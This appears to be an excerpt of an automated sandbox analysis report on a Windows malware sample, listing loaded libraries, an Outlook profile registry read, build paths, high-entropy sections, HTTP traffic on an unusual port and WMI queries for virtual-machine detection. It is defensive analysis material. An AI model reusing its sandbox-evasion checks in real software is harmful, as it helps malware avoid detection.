          Source: C:\Users\user\Desktop\bPkG0wTVon.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\chcp.comSection loaded: ulib.dllJump to behavior
          Source: C:\Windows\SysWOW64\chcp.comSection loaded: fsutilext.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\findstr.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
          Source: C:\Windows\SysWOW64\chcp.comSection loaded: ulib.dllJump to behavior
          Source: C:\Windows\SysWOW64\chcp.comSection loaded: fsutilext.dllJump to behavior
          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dllJump to behavior
          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dllJump to behavior
          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: bPkG0wTVon.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: bPkG0wTVon.exeStatic file information: File size 3084288 > 1048576
          Source: bPkG0wTVon.exeStatic PE information: Raw size of .\C3 is bigger than: 0x100000 < 0x184800
          Source: bPkG0wTVon.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: bPkG0wTVon.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: System.Xml.ni.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: C:\Users\Malware\source\repos\ConsoleApplication2\x64\Release\ConsoleApplication2.pdb source: bPkG0wTVon.exe
          Source: Binary string: C:\Users\Raifon\source\repos\Arcana\Arcana\bin\Release\Arcana.pdb source: bPkG0wTVon.exe
          Source: Binary string: System.ni.pdbRSDS source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\tdata source: bPkG0wTVon.exe, 00000000.00000002.1506746297.00000000076C9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Windows.Forms.ni.pdb source: bPkG0wTVon.exe, 00000000.00000002.1512294678.0000000070A0B000.00000020.00000001.01000000.00000007.sdmp, WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Management.pdbt source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Drawing.ni.pdb source: bPkG0wTVon.exe, 00000000.00000002.1524377559.0000000070BEB000.00000020.00000001.01000000.00000006.sdmp, WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Configuration.ni.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Net.Http.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Security.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Configuration.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Drawing.ni.pdbRSDS source: bPkG0wTVon.exe, 00000000.00000002.1524377559.0000000070BEB000.00000020.00000001.01000000.00000006.sdmp, WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Xml.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Xml.ni.pdbRSDS# source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Core.ni.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Windows.Forms.pdb source: bPkG0wTVon.exe, 00000000.00000002.1512294678.0000000070A0B000.00000020.00000001.01000000.00000007.sdmp, WERB95F.tmp.dmp.24.dr
          Source: Binary string: mscorlib.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\*ata source: bPkG0wTVon.exe, 00000000.00000002.1506746297.00000000076C9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: bPkG0wTVon.exe, 00000000.00000002.1512294678.0000000070A0B000.00000020.00000001.01000000.00000007.sdmp, WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Net.Http.ni.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Management.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Drawing.pdb source: bPkG0wTVon.exe, 00000000.00000002.1524377559.0000000070BEB000.00000020.00000001.01000000.00000006.sdmp, WERB95F.tmp.dmp.24.dr
          Source: Binary string: mscorlib.ni.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Management.ni.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: Arcana.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Core.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Configuration.pdbH source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: mscorlib.ni.pdbRSDS] source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.pdbp source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: C:\Users\Malware\source\repos\ConsoleApplication2\x64\Release\ConsoleApplication2.pdb" source: bPkG0wTVon.exe
          Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Net.Http.ni.pdbRSDS source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.ni.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Core.ni.pdbRSDS source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Web.pdb source: WERB95F.tmp.dmp.24.dr
          Source: bPkG0wTVon.exeStatic PE information: section name: .\C3
          Source: bPkG0wTVon.exeStatic PE information: section name: ."@W
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_04D524FB push eax; mov dword ptr [esp], ecx0_2_04D524FC
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_05DF9955 push esp; ret 0_2_05DF9A79
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_08314B88 push esp; ret 0_2_08314B89
          Source: bPkG0wTVon.exeStatic PE information: section name: .text entropy: 7.540602371038387
          Source: bPkG0wTVon.exeStatic PE information: section name: .\C3 entropy: 7.349314887296056

          Hooking and other Techniques for Hiding and Protection

          barindex
          Uses known network protocols on non-standard ports
          Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1490
          Source: unknownNetwork traffic detected: HTTP traffic on port 1490 -> 49718
          Source: unknownNetwork traffic detected: HTTP traffic on port 1490 -> 49718
          Source: unknownNetwork traffic detected: HTTP traffic on port 1490 -> 49718
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Queries memory information (via WMI often done to detect virtual machines)
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Speed FROM Win32_PhysicalMemory
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_CacheMemory
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from CIM_Memory
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Capacity FROM Win32_PhysicalMemory
          Queries pointing device information (via WMI, Win32_PointingDevice, often done to detect virtual machines)
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_PointingDevice
          Queries sensitive battery information (via WMI, Win32_Battery, often done to detect virtual machines)
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT EstimatedChargeRemaining, BatteryStatus FROM Win32_Battery
          Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
